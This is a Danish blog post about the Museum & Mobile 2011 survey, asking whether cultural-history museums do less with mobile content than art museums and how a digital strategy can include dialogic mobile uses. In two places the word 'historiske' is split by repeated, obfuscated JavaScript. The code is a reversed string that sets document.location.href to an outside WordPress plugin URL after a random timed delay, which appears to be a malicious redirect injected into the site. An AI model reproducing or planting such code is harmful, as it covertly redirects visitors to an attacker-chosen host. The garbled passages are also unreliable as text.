Er kulturhistoriske museer ikke så meget til mobil?

View more presentations from Loic Tallon.

En nyligt publiceret undersøgelse viser, at den mobile tilgang til kulturarven er noget, som flere og flere museer er opmærksomme på. I undersøgelsen Museum & Mobile 2011 ses det, at hovedparten af respondenterne enten har eller planlægger mobile tilgange. Hovedparten af disse har tanker om løsninger, hvor brugerne anvender deres egen, medbragte teknologi (slide 18).

Et andet element, som sprang i mine øjne er, at histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toriske museer tilsyneladende er mindre tilbøjelige til at arbejde med mobilt indhold end kunstmuseer (slide nr. 11).

Er histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toriske museer mindre digitalt-mobile end andre? Og gælder det mon også i Danmark, samt de øvrige skandinaviske lande?

Hvordan kan en digital strategi omfatte det mobile områdes forskellige facetter bedst muligt? De mobile tilgange kan dels rumme det oplagte, traditionelle tilbud: “guiden” i digital form, dvs. produktet, som museet har produceret. Det er “færdigt”, lukket som et trykt produkt – blot præsenteret digitalt. Men selvom en mobil kan bruges til at se præsentationer på, så er den fremfor alt et kommunikationsredskab. Hvordan kan de kommunikative og dialogiske tilgange også blive en del af den digitale strategi for mobilområdet?
..

Skriv et svar